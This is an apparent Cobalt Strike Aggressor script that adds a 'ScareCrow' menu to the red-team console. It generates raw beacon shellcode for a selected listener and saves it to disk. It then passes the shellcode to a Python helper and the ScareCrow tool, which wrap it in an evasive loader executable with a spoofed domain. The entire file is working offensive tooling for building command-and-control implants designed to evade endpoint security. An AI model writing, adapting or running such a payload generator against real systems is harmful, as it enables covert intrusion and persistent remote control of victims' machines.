############################################################
# Please do not use / at the end of the directories!
############################################################
$script_path = "/home/kali/ScareCrow-CobaltStrike";
$scarecrow_executable = "/home/kali/ScareCrow-CobaltStrike/ScareCrow/ScareCrow";
$cs_directory = "/home/kali/cobaltstrike";
$python3 = "/usr/bin/python3";
############################################################

menubar("ScareCrow", "scare_crow");

popup scare_crow {
	item "&ScareCrow" {
		ScareCrow();
	}
}

sub ScareCrow {
	$dialog = dialog("ScareCrow Payload Generator (S)", %(listener => "", payload_type => "Payload Type: ", output => "output: "), &ScareCrowCallback);
	drow_listener_stage($dialog, "listener", "Listener: ");
    drow_combobox($dialog, "payload_type", "Payload Type: ", @("Stageless"));
    drow_combobox($dialog, "architecture", "Architecture: ", @("x64"));
    drow_combobox($dialog, "loader", "Loader: ", @("binary"));
    drow_text($dialog, "domain", "Domain: ");
	dbutton_action($dialog, "Generate");
	dialog_show($dialog);
}

sub ScareCrowCallback {
	if ($3['listener'] eq "") {
		show_message("No listener specified!");
		exit();
	}

    $shellcode = artifact_payload($3['listener'], "raw", $3['architecture']);

	$loader = $3['loader'];
	$domain = $3['domain'];

	prompt_file_save("scbeacon.bin", {

		show_message("Generating executable, please wait...");
		close_message

		$path = "$1";
	
		$handle = openf(">" . $1);
		writeb($handle, $shellcode);
		closef($handle);

		$data = exec($python3 . " " . $script_path . "/Helper.py" . " " . $scarecrow_executable . " " . $1 . " " . $loader . " " . $domain . " " . $cs_directory);
		$pythondata = readAll($data);
		
		show_message("Executable saved to: " . $pythondata);
    });
}
